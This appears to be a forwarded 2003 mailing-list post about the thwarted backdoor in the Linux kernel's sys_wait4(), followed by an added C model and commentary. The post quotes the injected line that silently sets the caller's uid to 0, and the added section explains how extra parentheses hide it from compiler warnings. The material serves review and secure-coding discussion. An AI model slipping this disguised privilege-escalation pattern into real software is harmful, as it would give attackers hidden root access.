Thwarted Linux backdoor

Douglas W. Jones jones at cs.uiowa.edu
Tue Nov 11 07:21:16 PST 2003


On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
Linux was averted.  This is a really good example of the subtle kinds of
hacks a source code examiner must be waiting to catch if we want genuinely
secure voting systems under the current model of proprietary DRE systems
with a closed-door source code examination.

Someone broke into a server at kernel.kbits.net and inserted the following
code into the Linux kernel:

         if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                         retval = -EINVAL;

This was done in the code sys_wait4().  Larry McVoy caught the fact that the
change had been made, and was annoyed because it wasn't logged properly.
Matthew Dharm asked "Out of curiosity, what were the changed lines."  Zwane
Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if
you hope to get root."

So, an annoying violation of the software change logging requirements turned
out to be an attempt to install a backdoor in Linux.  At least two very
experienced programmers looked at it and saw just slightly odd code, before
the serious nature of the threat was actually discovered.

This particular attack, by the way, is ruled out by the current voting
system standards, not because they require a comprehensive security
analysis, but because of their C-centered coding rules.  Embedded assignment
is forbidden.  Current source code checks are good at finding embedded
assignments and flagging them (as long as the code is written in C).  No
doubt, a hacker of the sophistication suggested by the attack illustrated
above would strictly adhere to the coding guidelines in formulating their
attack.

For the complete story of this attack on Linux, including the actual E-mail
exchange documenting the discovery of the attack, see:

     http://kerneltrap.org/node/view/1584
     Linux: Kernel "Back Door" Attempt

This attack has only made the mainstream media in one place, so far:

     http://www.smh.com.au/articles/2003/11/07/1068013371170.html
     Bid to backdoor Linux kernel detected - smh.com.au

This is a pity, because I think this story is really important.


----- End forwarded message -----
-- Eugen* Leitl <a href="http://leitl.org">leitl</a>
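The following is an added user-space model of the injected condition, not code from the original post or from the Linux kernel. It keeps the shape of the two quoted lines but replaces the kernel's `current` macro, `struct task_struct`, option bits and errno value with stand-ins (the `__WCLONE`/`__WALL`/`EINVAL` values below are assumed, and `current` is a plain global pointer). The point it makes visible is why two experienced readers saw only "odd" code: `current->uid = 0` is an assignment whose value is 0, so the `&&` is never true, the `-EINVAL` branch is dead, and the only effect of the statement is that any caller passing exactly `__WCLONE|__WALL` becomes uid 0.

```c
#include <stdio.h>

/* Assumed stand-ins for the kernel's option bits and errno value. */
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u
#define EINVAL   22

struct task { unsigned int uid; };

/* In the kernel, `current` names the calling task; here it is a global
 * so the side effect of the condition can be observed after the call. */
static struct task current_task;
static struct task *current = &current_task;

/* The condition exactly as injected: `=` where `==` was meant. */
long wait4_backdoored(unsigned int options)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a reader skimming the diff assumes it says. */
long wait4_intended(unsigned int options)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

static long last_ret;

/* Call one variant as a task with uid start_uid and return the uid the
 * task has afterwards; the variant's return value is kept in last_ret. */
unsigned int uid_after(long (*fn)(unsigned int), unsigned int options,
                       unsigned int start_uid)
{
    current_task.uid = start_uid;
    last_ret = fn(options);
    return current_task.uid;
}

long last_return(void) { return last_ret; }

int main(void)
{
    unsigned int uid;

    uid = uid_after(wait4_backdoored, __WCLONE|__WALL, 1000);
    printf("backdoored, magic options:   uid 1000 -> %u, ret %ld\n", uid, last_return());

    uid = uid_after(wait4_backdoored, __WCLONE, 1000);
    printf("backdoored, normal options:  uid 1000 -> %u, ret %ld\n", uid, last_return());

    uid = uid_after(wait4_intended, __WCLONE|__WALL, 1000);
    printf("intended, non-root caller:   uid 1000 -> %u, ret %ld\n", uid, last_return());

    uid = uid_after(wait4_intended, __WCLONE|__WALL, 0);
    printf("intended, root caller:       uid 0    -> %u, ret %ld\n", uid, last_return());
    return 0;
}
```

Two things worth noting when reading the output. First, the backdoored variant never returns `-EINVAL` for anything, so the line does nothing visible to a normal program and only rewards the caller that knows the magic option combination. Second, the extra parentheses around `current->uid = 0` are exactly the idiom that silences GCC's `-Wparentheses` ("suggest parentheses around assignment used as truth value"), so a compiler warning would not have flagged it; a coding rule that forbids embedded assignment outright, enforced by a source check, is what catches this shape.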